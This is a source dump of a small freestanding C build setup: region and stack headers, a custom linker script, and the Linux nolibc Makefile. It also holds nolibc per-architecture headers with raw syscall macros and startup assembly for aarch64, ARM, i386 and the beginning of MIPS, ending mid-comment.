/exp/consts/prog_regions.h:
-------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | extern char __text_start[]; 4 | extern char __text_end[]; 5 | 6 | extern char __data_start[]; 7 | extern char __data_end[]; 8 | -------------------------------------------------------------------------------- /exp/consts/stack.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define COMMON_STACK_SIZE 2048 4 | #define STACK_ALIGNED __attribute__((aligned(16))) 5 | -------------------------------------------------------------------------------- /exp/linkscript.lds: -------------------------------------------------------------------------------- 1 | ENTRY(_start) 2 | 3 | SECTIONS 4 | { 5 | . = 0x40000; 6 | 7 | __text_start = .; 8 | 9 | .text : 10 | { 11 | *(.text) *(.text.*) 12 | *(.rodata) *(.rodata.*) 13 | } 14 | 15 | __text_end = .; 16 | 17 | . = ALIGN(4096); 18 | 19 | __data_start = .; 20 | 21 | .data : 22 | { 23 | *(.data) *(.data.*) 24 | *(.bss) *(.bss.*) 25 | } 26 | 27 | __data_end = .; 28 | 29 | /DISCARD/ : { *(*) } 30 | } 31 | -------------------------------------------------------------------------------- /exp/nolibc/Makefile: -------------------------------------------------------------------------------- 1 | # SPDX-License-Identifier: GPL-2.0 2 | # Makefile for nolibc installation and tests 3 | include ../../scripts/Makefile.include 4 | 5 | # we're in ".../tools/include/nolibc" 6 | ifeq ($(srctree),) 7 | srctree := $(patsubst %/tools/include/,%,$(dir $(CURDIR))) 8 | endif 9 | 10 | # when run as make -C tools/ nolibc_<target> the arch is not set 11 | ifeq ($(ARCH),) 12 | include $(srctree)/scripts/subarch.include 13 | ARCH = $(SUBARCH) 14 | endif 15 | 16 | # OUTPUT is only set when run from the main makefile, otherwise 17 | # it defaults to this nolibc directory.
18 | OUTPUT ?= $(CURDIR)/ 19 | 20 | ifeq ($(V),1) 21 | Q= 22 | else 23 | Q=@ 24 | endif 25 | 26 | nolibc_arch := $(patsubst arm64,aarch64,$(ARCH)) 27 | arch_file := arch-$(nolibc_arch).h 28 | all_files := ctype.h errno.h nolibc.h signal.h std.h stdio.h stdlib.h string.h \ 29 | sys.h time.h types.h unistd.h 30 | 31 | # install all headers needed to support a bare-metal compiler 32 | all: headers 33 | 34 | install: help 35 | 36 | help: 37 | @echo "Supported targets under nolibc:" 38 | @echo " all call \"headers\"" 39 | @echo " clean clean the sysroot" 40 | @echo " headers prepare a sysroot in tools/include/nolibc/sysroot" 41 | @echo " headers_standalone like \"headers\", and also install kernel headers" 42 | @echo " help this help" 43 | @echo "" 44 | @echo "These targets may also be called from tools as \"make nolibc_<target>\"." 45 | @echo "" 46 | @echo "Currently using the following variables:" 47 | @echo " ARCH = $(ARCH)" 48 | @echo " OUTPUT = $(OUTPUT)" 49 | @echo "" 50 | 51 | # Note: when ARCH is "x86" we concatenate both x86_64 and i386 52 | headers: 53 | $(Q)mkdir -p $(OUTPUT)sysroot 54 | $(Q)mkdir -p $(OUTPUT)sysroot/include 55 | $(Q)cp $(all_files) $(OUTPUT)sysroot/include/ 56 | $(Q)if [ "$(ARCH)" = "x86" ]; then \ 57 | sed -e \ 58 | 's,^#ifndef _NOLIBC_ARCH_X86_64_H,#if !defined(_NOLIBC_ARCH_X86_64_H) \&\& defined(__x86_64__),' \ 59 | arch-x86_64.h; \ 60 | sed -e \ 61 | 's,^#ifndef _NOLIBC_ARCH_I386_H,#if !defined(_NOLIBC_ARCH_I386_H) \&\& !defined(__x86_64__),' \ 62 | arch-i386.h; \ 63 | elif [ -e "$(arch_file)" ]; then \ 64 | cat $(arch_file); \ 65 | else \ 66 | echo "Fatal: architecture $(ARCH) not yet supported by nolibc."
>&2; \ 67 | exit 1; \ 68 | fi > $(OUTPUT)sysroot/include/arch.h 69 | 70 | headers_standalone: headers 71 | $(Q)$(MAKE) -C $(srctree) headers 72 | $(Q)$(MAKE) -C $(srctree) headers_install INSTALL_HDR_PATH=$(OUTPUT)sysroot 73 | 74 | clean: 75 | $(call QUIET_CLEAN, nolibc) rm -rf "$(OUTPUT)sysroot" 76 | -------------------------------------------------------------------------------- /exp/nolibc/arch-aarch64.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * AARCH64 specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau <w@1wt.eu> 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_AARCH64_H 8 | #define _NOLIBC_ARCH_AARCH64_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x4000 21 | 22 | /* The struct returned by the newfstatat() syscall. Differs slightly from the 23 | * x86_64's stat one by field ordering, so be careful.
24 | */ 25 | struct sys_stat_struct { 26 | unsigned long st_dev; 27 | unsigned long st_ino; 28 | unsigned int st_mode; 29 | unsigned int st_nlink; 30 | unsigned int st_uid; 31 | unsigned int st_gid; 32 | 33 | unsigned long st_rdev; 34 | unsigned long __pad1; 35 | long st_size; 36 | int st_blksize; 37 | int __pad2; 38 | 39 | long st_blocks; 40 | long st_atime; 41 | unsigned long st_atime_nsec; 42 | long st_mtime; 43 | 44 | unsigned long st_mtime_nsec; 45 | long st_ctime; 46 | unsigned long st_ctime_nsec; 47 | unsigned int __unused[2]; 48 | }; 49 | 50 | /* Syscalls for AARCH64 : 51 | * - registers are 64-bit 52 | * - stack is 16-byte aligned 53 | * - syscall number is passed in x8 54 | * - arguments are in x0, x1, x2, x3, x4, x5 55 | * - the system call is performed by calling svc 0 56 | * - syscall return comes in x0. 57 | * - the arguments are cast to long and assigned into the target registers 58 | * which are then simply passed as registers to the asm code, so that we 59 | * don't have to experience issues with register constraints. 60 | * 61 | * On aarch64, select() is not implemented so we have to use pselect6(). 
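 *
 * Illustrative use (not part of upstream nolibc; __NR_write is 64 on
 * aarch64), issuing a raw write(2) to stdout:
 *
 *   long ret = my_syscall3(64, 1, "hi\n", 3);
 *
 * The result is the raw kernel return value: negative values encode
 * -errno, as usual for raw syscalls.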
62 | */ 63 | #define __ARCH_WANT_SYS_PSELECT6 64 | 65 | #define my_syscall0(num) \ 66 | ({ \ 67 | register long _num __asm__ ("x8") = (num); \ 68 | register long _arg1 __asm__ ("x0"); \ 69 | \ 70 | __asm__ volatile ( \ 71 | "svc #0\n" \ 72 | : "=r"(_arg1) \ 73 | : "r"(_num) \ 74 | : "memory", "cc" \ 75 | ); \ 76 | _arg1; \ 77 | }) 78 | 79 | #define my_syscall1(num, arg1) \ 80 | ({ \ 81 | register long _num __asm__ ("x8") = (num); \ 82 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 83 | \ 84 | __asm__ volatile ( \ 85 | "svc #0\n" \ 86 | : "=r"(_arg1) \ 87 | : "r"(_arg1), \ 88 | "r"(_num) \ 89 | : "memory", "cc" \ 90 | ); \ 91 | _arg1; \ 92 | }) 93 | 94 | #define my_syscall2(num, arg1, arg2) \ 95 | ({ \ 96 | register long _num __asm__ ("x8") = (num); \ 97 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 98 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 99 | \ 100 | __asm__ volatile ( \ 101 | "svc #0\n" \ 102 | : "=r"(_arg1) \ 103 | : "r"(_arg1), "r"(_arg2), \ 104 | "r"(_num) \ 105 | : "memory", "cc" \ 106 | ); \ 107 | _arg1; \ 108 | }) 109 | 110 | #define my_syscall3(num, arg1, arg2, arg3) \ 111 | ({ \ 112 | register long _num __asm__ ("x8") = (num); \ 113 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 114 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 115 | register long _arg3 __asm__ ("x2") = (long)(arg3); \ 116 | \ 117 | __asm__ volatile ( \ 118 | "svc #0\n" \ 119 | : "=r"(_arg1) \ 120 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), \ 121 | "r"(_num) \ 122 | : "memory", "cc" \ 123 | ); \ 124 | _arg1; \ 125 | }) 126 | 127 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 128 | ({ \ 129 | register long _num __asm__ ("x8") = (num); \ 130 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 131 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 132 | register long _arg3 __asm__ ("x2") = (long)(arg3); \ 133 | register long _arg4 __asm__ ("x3") = (long)(arg4); \ 134 | \ 135 | __asm__ volatile ( \ 136 | "svc #0\n" \ 137 | : 
"=r"(_arg1) \ 138 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 139 | "r"(_num) \ 140 | : "memory", "cc" \ 141 | ); \ 142 | _arg1; \ 143 | }) 144 | 145 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 146 | ({ \ 147 | register long _num __asm__ ("x8") = (num); \ 148 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 149 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 150 | register long _arg3 __asm__ ("x2") = (long)(arg3); \ 151 | register long _arg4 __asm__ ("x3") = (long)(arg4); \ 152 | register long _arg5 __asm__ ("x4") = (long)(arg5); \ 153 | \ 154 | __asm__ volatile ( \ 155 | "svc #0\n" \ 156 | : "=r" (_arg1) \ 157 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 158 | "r"(_num) \ 159 | : "memory", "cc" \ 160 | ); \ 161 | _arg1; \ 162 | }) 163 | 164 | #define my_syscall6(num, arg1, arg2, arg3, arg4, arg5, arg6) \ 165 | ({ \ 166 | register long _num __asm__ ("x8") = (num); \ 167 | register long _arg1 __asm__ ("x0") = (long)(arg1); \ 168 | register long _arg2 __asm__ ("x1") = (long)(arg2); \ 169 | register long _arg3 __asm__ ("x2") = (long)(arg3); \ 170 | register long _arg4 __asm__ ("x3") = (long)(arg4); \ 171 | register long _arg5 __asm__ ("x4") = (long)(arg5); \ 172 | register long _arg6 __asm__ ("x5") = (long)(arg6); \ 173 | \ 174 | __asm__ volatile ( \ 175 | "svc #0\n" \ 176 | : "=r" (_arg1) \ 177 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 178 | "r"(_arg6), "r"(_num) \ 179 | : "memory", "cc" \ 180 | ); \ 181 | _arg1; \ 182 | }) 183 | 184 | /* startup code */ 185 | __asm__ (".section .text\n" 186 | ".weak _start\n" 187 | "_start:\n" 188 | "ldr x0, [sp]\n" // argc (x0) was in the stack 189 | "add x1, sp, 8\n" // argv (x1) = sp 190 | "lsl x2, x0, 3\n" // envp (x2) = 8*argc ... 
191 | "add x2, x2, 8\n" // + 8 (skip null) 192 | "add x2, x2, x1\n" // + argv 193 | "and sp, x1, -16\n" // sp must be 16-byte aligned in the callee 194 | "bl main\n" // main() returns the status code, we'll exit with it. 195 | "mov x8, 93\n" // NR_exit == 93 196 | "svc #0\n" 197 | ""); 198 | 199 | #endif // _NOLIBC_ARCH_AARCH64_H 200 | -------------------------------------------------------------------------------- /exp/nolibc/arch-arm.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * ARM specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_ARM_H 8 | #define _NOLIBC_ARCH_ARM_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x4000 21 | 22 | /* The struct returned by the stat() syscall, 32-bit only, the syscall returns 23 | * exactly 56 bytes (stops before the unused array). In big endian, the format 24 | * differs as devices are returned as short only. 
25 | */ 26 | struct sys_stat_struct { 27 | #if defined(__ARMEB__) 28 | unsigned short st_dev; 29 | unsigned short __pad1; 30 | #else 31 | unsigned long st_dev; 32 | #endif 33 | unsigned long st_ino; 34 | unsigned short st_mode; 35 | unsigned short st_nlink; 36 | unsigned short st_uid; 37 | unsigned short st_gid; 38 | 39 | #if defined(__ARMEB__) 40 | unsigned short st_rdev; 41 | unsigned short __pad2; 42 | #else 43 | unsigned long st_rdev; 44 | #endif 45 | unsigned long st_size; 46 | unsigned long st_blksize; 47 | unsigned long st_blocks; 48 | 49 | unsigned long st_atime; 50 | unsigned long st_atime_nsec; 51 | unsigned long st_mtime; 52 | unsigned long st_mtime_nsec; 53 | 54 | unsigned long st_ctime; 55 | unsigned long st_ctime_nsec; 56 | unsigned long __unused[2]; 57 | }; 58 | 59 | /* Syscalls for ARM in ARM or Thumb modes : 60 | * - registers are 32-bit 61 | * - stack is 8-byte aligned 62 | * ( http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.faqs/ka4127.html) 63 | * - syscall number is passed in r7 64 | * - arguments are in r0, r1, r2, r3, r4, r5 65 | * - the system call is performed by calling svc #0 66 | * - syscall return comes in r0. 67 | * - only lr is clobbered. 68 | * - the arguments are cast to long and assigned into the target registers 69 | * which are then simply passed as registers to the asm code, so that we 70 | * don't have to experience issues with register constraints. 71 | * - the syscall number is always specified last in order to allow to force 72 | * some registers before (gcc refuses a %-register at the last position). 
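 *
 * Illustrative use (not part of upstream nolibc; __NR_write is 4 on ARM
 * EABI), issuing a raw write(2) to stdout:
 *
 *   long ret = my_syscall3(4, 1, "hi\n", 3);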
73 | * 74 | * Also, ARM supports the old_select syscall if newselect is not available 75 | */ 76 | #define __ARCH_WANT_SYS_OLD_SELECT 77 | 78 | #define my_syscall0(num) \ 79 | ({ \ 80 | register long _num __asm__ ("r7") = (num); \ 81 | register long _arg1 __asm__ ("r0"); \ 82 | \ 83 | __asm__ volatile ( \ 84 | "svc #0\n" \ 85 | : "=r"(_arg1) \ 86 | : "r"(_num) \ 87 | : "memory", "cc", "lr" \ 88 | ); \ 89 | _arg1; \ 90 | }) 91 | 92 | #define my_syscall1(num, arg1) \ 93 | ({ \ 94 | register long _num __asm__ ("r7") = (num); \ 95 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 96 | \ 97 | __asm__ volatile ( \ 98 | "svc #0\n" \ 99 | : "=r"(_arg1) \ 100 | : "r"(_arg1), \ 101 | "r"(_num) \ 102 | : "memory", "cc", "lr" \ 103 | ); \ 104 | _arg1; \ 105 | }) 106 | 107 | #define my_syscall2(num, arg1, arg2) \ 108 | ({ \ 109 | register long _num __asm__ ("r7") = (num); \ 110 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 111 | register long _arg2 __asm__ ("r1") = (long)(arg2); \ 112 | \ 113 | __asm__ volatile ( \ 114 | "svc #0\n" \ 115 | : "=r"(_arg1) \ 116 | : "r"(_arg1), "r"(_arg2), \ 117 | "r"(_num) \ 118 | : "memory", "cc", "lr" \ 119 | ); \ 120 | _arg1; \ 121 | }) 122 | 123 | #define my_syscall3(num, arg1, arg2, arg3) \ 124 | ({ \ 125 | register long _num __asm__ ("r7") = (num); \ 126 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 127 | register long _arg2 __asm__ ("r1") = (long)(arg2); \ 128 | register long _arg3 __asm__ ("r2") = (long)(arg3); \ 129 | \ 130 | __asm__ volatile ( \ 131 | "svc #0\n" \ 132 | : "=r"(_arg1) \ 133 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), \ 134 | "r"(_num) \ 135 | : "memory", "cc", "lr" \ 136 | ); \ 137 | _arg1; \ 138 | }) 139 | 140 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 141 | ({ \ 142 | register long _num __asm__ ("r7") = (num); \ 143 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 144 | register long _arg2 __asm__ ("r1") = (long)(arg2); \ 145 | register long _arg3 __asm__ ("r2") = (long)(arg3); \ 146 
| register long _arg4 __asm__ ("r3") = (long)(arg4); \ 147 | \ 148 | __asm__ volatile ( \ 149 | "svc #0\n" \ 150 | : "=r"(_arg1) \ 151 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 152 | "r"(_num) \ 153 | : "memory", "cc", "lr" \ 154 | ); \ 155 | _arg1; \ 156 | }) 157 | 158 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 159 | ({ \ 160 | register long _num __asm__ ("r7") = (num); \ 161 | register long _arg1 __asm__ ("r0") = (long)(arg1); \ 162 | register long _arg2 __asm__ ("r1") = (long)(arg2); \ 163 | register long _arg3 __asm__ ("r2") = (long)(arg3); \ 164 | register long _arg4 __asm__ ("r3") = (long)(arg4); \ 165 | register long _arg5 __asm__ ("r4") = (long)(arg5); \ 166 | \ 167 | __asm__ volatile ( \ 168 | "svc #0\n" \ 169 | : "=r" (_arg1) \ 170 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 171 | "r"(_num) \ 172 | : "memory", "cc", "lr" \ 173 | ); \ 174 | _arg1; \ 175 | }) 176 | 177 | /* startup code */ 178 | __asm__ (".section .text\n" 179 | ".weak _start\n" 180 | "_start:\n" 181 | #if defined(__THUMBEB__) || defined(__THUMBEL__) 182 | /* We enter here in 32-bit mode but if some previous functions were in 183 | * 16-bit mode, the assembler cannot know, so we need to tell it we're in 184 | * 32-bit now, then switch to 16-bit (is there a better way to do it than 185 | * adding 1 by hand ?) and tell the asm we're now in 16-bit mode so that 186 | * it generates correct instructions. Note that we do not support thumb1. 187 | */ 188 | ".code 32\n" 189 | "add r0, pc, #1\n" 190 | "bx r0\n" 191 | ".code 16\n" 192 | #endif 193 | "pop {%r0}\n" // argc was in the stack 194 | "mov %r1, %sp\n" // argv = sp 195 | "add %r2, %r1, %r0, lsl #2\n" // envp = argv + 4*argc ... 196 | "add %r2, %r2, $4\n" // ... + 4 197 | "and %r3, %r1, $-8\n" // AAPCS : sp must be 8-byte aligned in the 198 | "mov %sp, %r3\n" // callee, and bl doesn't push (lr=pc) 199 | "bl main\n" // main() returns the status code, we'll exit with it.
200 | "movs r7, $1\n" // NR_exit == 1 201 | "svc $0x00\n" 202 | ""); 203 | 204 | #endif // _NOLIBC_ARCH_ARM_H 205 | -------------------------------------------------------------------------------- /exp/nolibc/arch-i386.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * i386 specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_I386_H 8 | #define _NOLIBC_ARCH_I386_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_CREAT 0x40 15 | #define O_EXCL 0x80 16 | #define O_NOCTTY 0x100 17 | #define O_TRUNC 0x200 18 | #define O_APPEND 0x400 19 | #define O_NONBLOCK 0x800 20 | #define O_DIRECTORY 0x10000 21 | 22 | /* The struct returned by the stat() syscall, 32-bit only, the syscall returns 23 | * exactly 56 bytes (stops before the unused array). 
24 | */ 25 | struct sys_stat_struct { 26 | unsigned long st_dev; 27 | unsigned long st_ino; 28 | unsigned short st_mode; 29 | unsigned short st_nlink; 30 | unsigned short st_uid; 31 | unsigned short st_gid; 32 | 33 | unsigned long st_rdev; 34 | unsigned long st_size; 35 | unsigned long st_blksize; 36 | unsigned long st_blocks; 37 | 38 | unsigned long st_atime; 39 | unsigned long st_atime_nsec; 40 | unsigned long st_mtime; 41 | unsigned long st_mtime_nsec; 42 | 43 | unsigned long st_ctime; 44 | unsigned long st_ctime_nsec; 45 | unsigned long __unused[2]; 46 | }; 47 | 48 | /* Syscalls for i386 : 49 | * - mostly similar to x86_64 50 | * - registers are 32-bit 51 | * - syscall number is passed in eax 52 | * - arguments are in ebx, ecx, edx, esi, edi, ebp respectively 53 | * - all registers are preserved (except eax of course) 54 | * - the system call is performed by calling int $0x80 55 | * - syscall return comes in eax 56 | * - the arguments are cast to long and assigned into the target registers 57 | * which are then simply passed as registers to the asm code, so that we 58 | * don't have to experience issues with register constraints. 59 | * - the syscall number is always specified last in order to allow to force 60 | * some registers before (gcc refuses a %-register at the last position). 
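 *
 * Illustrative use (not part of upstream nolibc; __NR_write is 4 on
 * i386), issuing a raw write(2) to stdout:
 *
 *   long ret = my_syscall3(4, 1, "hi\n", 3);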
61 | * 62 | * Also, i386 supports the old_select syscall if newselect is not available 63 | */ 64 | #define __ARCH_WANT_SYS_OLD_SELECT 65 | 66 | #define my_syscall0(num) \ 67 | ({ \ 68 | long _ret; \ 69 | register long _num __asm__ ("eax") = (num); \ 70 | \ 71 | __asm__ volatile ( \ 72 | "int $0x80\n" \ 73 | : "=a" (_ret) \ 74 | : "0"(_num) \ 75 | : "memory", "cc" \ 76 | ); \ 77 | _ret; \ 78 | }) 79 | 80 | #define my_syscall1(num, arg1) \ 81 | ({ \ 82 | long _ret; \ 83 | register long _num __asm__ ("eax") = (num); \ 84 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 85 | \ 86 | __asm__ volatile ( \ 87 | "int $0x80\n" \ 88 | : "=a" (_ret) \ 89 | : "r"(_arg1), \ 90 | "0"(_num) \ 91 | : "memory", "cc" \ 92 | ); \ 93 | _ret; \ 94 | }) 95 | 96 | #define my_syscall2(num, arg1, arg2) \ 97 | ({ \ 98 | long _ret; \ 99 | register long _num __asm__ ("eax") = (num); \ 100 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 101 | register long _arg2 __asm__ ("ecx") = (long)(arg2); \ 102 | \ 103 | __asm__ volatile ( \ 104 | "int $0x80\n" \ 105 | : "=a" (_ret) \ 106 | : "r"(_arg1), "r"(_arg2), \ 107 | "0"(_num) \ 108 | : "memory", "cc" \ 109 | ); \ 110 | _ret; \ 111 | }) 112 | 113 | #define my_syscall3(num, arg1, arg2, arg3) \ 114 | ({ \ 115 | long _ret; \ 116 | register long _num __asm__ ("eax") = (num); \ 117 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 118 | register long _arg2 __asm__ ("ecx") = (long)(arg2); \ 119 | register long _arg3 __asm__ ("edx") = (long)(arg3); \ 120 | \ 121 | __asm__ volatile ( \ 122 | "int $0x80\n" \ 123 | : "=a" (_ret) \ 124 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), \ 125 | "0"(_num) \ 126 | : "memory", "cc" \ 127 | ); \ 128 | _ret; \ 129 | }) 130 | 131 | #define my_syscall4(num, arg1, arg2, arg3, arg4) \ 132 | ({ \ 133 | long _ret; \ 134 | register long _num __asm__ ("eax") = (num); \ 135 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 136 | register long _arg2 __asm__ ("ecx") = (long)(arg2); \ 137 | register long _arg3 
__asm__ ("edx") = (long)(arg3); \ 138 | register long _arg4 __asm__ ("esi") = (long)(arg4); \ 139 | \ 140 | __asm__ volatile ( \ 141 | "int $0x80\n" \ 142 | : "=a" (_ret) \ 143 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), \ 144 | "0"(_num) \ 145 | : "memory", "cc" \ 146 | ); \ 147 | _ret; \ 148 | }) 149 | 150 | #define my_syscall5(num, arg1, arg2, arg3, arg4, arg5) \ 151 | ({ \ 152 | long _ret; \ 153 | register long _num __asm__ ("eax") = (num); \ 154 | register long _arg1 __asm__ ("ebx") = (long)(arg1); \ 155 | register long _arg2 __asm__ ("ecx") = (long)(arg2); \ 156 | register long _arg3 __asm__ ("edx") = (long)(arg3); \ 157 | register long _arg4 __asm__ ("esi") = (long)(arg4); \ 158 | register long _arg5 __asm__ ("edi") = (long)(arg5); \ 159 | \ 160 | __asm__ volatile ( \ 161 | "int $0x80\n" \ 162 | : "=a" (_ret) \ 163 | : "r"(_arg1), "r"(_arg2), "r"(_arg3), "r"(_arg4), "r"(_arg5), \ 164 | "0"(_num) \ 165 | : "memory", "cc" \ 166 | ); \ 167 | _ret; \ 168 | }) 169 | 170 | #define my_syscall6(num, arg1, arg2, arg3, arg4, arg5, arg6) \ 171 | ({ \ 172 | long _eax = (long)(num); \ 173 | long _arg6 = (long)(arg6); /* Always in memory */ \ 174 | __asm__ volatile ( \ 175 | "pushl %[_arg6]\n\t" \ 176 | "pushl %%ebp\n\t" \ 177 | "movl 4(%%esp),%%ebp\n\t" \ 178 | "int $0x80\n\t" \ 179 | "popl %%ebp\n\t" \ 180 | "addl $4,%%esp\n\t" \ 181 | : "+a"(_eax) /* %eax */ \ 182 | : "b"(arg1), /* %ebx */ \ 183 | "c"(arg2), /* %ecx */ \ 184 | "d"(arg3), /* %edx */ \ 185 | "S"(arg4), /* %esi */ \ 186 | "D"(arg5), /* %edi */ \ 187 | [_arg6]"m"(_arg6) /* memory */ \ 188 | : "memory", "cc" \ 189 | ); \ 190 | _eax; \ 191 | }) 192 | 193 | /* startup code */ 194 | /* 195 | * i386 System V ABI mandates: 196 | * 1) last pushed argument must be 16-byte aligned. 
197 | * 2) The deepest stack frame should be set to zero 198 | * 199 | */ 200 | __asm__ (".section .text\n" 201 | ".weak _start\n" 202 | "_start:\n" 203 | "pop %eax\n" // argc (first arg, %eax) 204 | "mov %esp, %ebx\n" // argv[] (second arg, %ebx) 205 | "lea 4(%ebx,%eax,4),%ecx\n" // then a NULL then envp (third arg, %ecx) 206 | "xor %ebp, %ebp\n" // zero the stack frame 207 | "and $-16, %esp\n" // x86 ABI : esp must be 16-byte aligned before 208 | "sub $4, %esp\n" // the call instruction (args are aligned) 209 | "push %ecx\n" // push all registers on the stack so that we 210 | "push %ebx\n" // support both regparm and plain stack modes 211 | "push %eax\n" 212 | "call main\n" // main() returns the status code in %eax 213 | "mov %eax, %ebx\n" // retrieve exit code (32-bit int) 214 | "movl $1, %eax\n" // NR_exit == 1 215 | "int $0x80\n" // exit now 216 | "hlt\n" // ensure it does not 217 | ""); 218 | 219 | #endif // _NOLIBC_ARCH_I386_H 220 | -------------------------------------------------------------------------------- /exp/nolibc/arch-mips.h: -------------------------------------------------------------------------------- 1 | /* SPDX-License-Identifier: LGPL-2.1 OR MIT */ 2 | /* 3 | * MIPS specific definitions for NOLIBC 4 | * Copyright (C) 2017-2022 Willy Tarreau 5 | */ 6 | 7 | #ifndef _NOLIBC_ARCH_MIPS_H 8 | #define _NOLIBC_ARCH_MIPS_H 9 | 10 | /* O_* macros for fcntl/open are architecture-specific */ 11 | #define O_RDONLY 0 12 | #define O_WRONLY 1 13 | #define O_RDWR 2 14 | #define O_APPEND 0x0008 15 | #define O_NONBLOCK 0x0080 16 | #define O_CREAT 0x0100 17 | #define O_TRUNC 0x0200 18 | #define O_EXCL 0x0400 19 | #define O_NOCTTY 0x0800 20 | #define O_DIRECTORY 0x10000 21 | 22 | /* The struct returned by the stat() syscall. 88 bytes are returned by the 23 | * syscall. 
24 | */ 25 | struct sys_stat_struct { 26 | unsigned int st_dev; 27 | long st_pad1[3]; 28 | unsigned long st_ino; 29 | unsigned int st_mode; 30 | unsigned int st_nlink; 31 | unsigned int st_uid; 32 | unsigned int st_gid; 33 | unsigned int st_rdev; 34 | long st_pad2[2]; 35 | long st_size; 36 | long st_pad3; 37 | 38 | long st_atime; 39 | long st_atime_nsec; 40 | long st_mtime; 41 | long st_mtime_nsec; 42 | 43 | long st_ctime; 44 | long st_ctime_nsec; 45 | long st_blksize; 46 | long st_blocks; 47 | long st_pad4[14]; 48 | }; 49 | 50 | /* Syscalls for MIPS ABI O32 : 51 | * - WARNING! there's always a delayed slot! 52 | * - WARNING again, the syntax is different, registers take a '$' and numbers 53 | * do not. 54 | * - registers are 32-bit 55 | * - stack is 8-byte aligned 56 | * - syscall number is passed in v0 (starts at 0xfa0). 57 | * - arguments are in a0, a1, a2, a3, then the stack. The caller needs to 58 | * leave some room in the stack for the callee to save a0..a3 if needed. 59 | * - Many registers are clobbered, in fact only a0..a2 and s0..s8 are 60 | * preserved. See: https://www.linux-mips.org/wiki/Syscall as well as 61 | * scall32-o32.S in the kernel sources. 62 | * - the system call is performed by calling "syscall" 63 | * - syscall return comes in v0, and register a3 needs to be checked to know 64 | * if an error occurred, in which case errno is in v0. 65 | * - the arguments are cast to long and assigned into the target registers 66 | * which are then simply passed as registers to the asm code, so that we 67 | * don't have to experience issues with register constraints. 
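 *
 * Illustrative use (not part of upstream nolibc; __NR_write is 4004 in
 * the O32 ABI), issuing a raw write(2) to stdout:
 *
 *   long ret = my_syscall3(4004, 1, "hi\n", 3);
 *
 * Note that the macros above already check a3 and turn the error case
 * into a negative return value, matching the other architectures.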
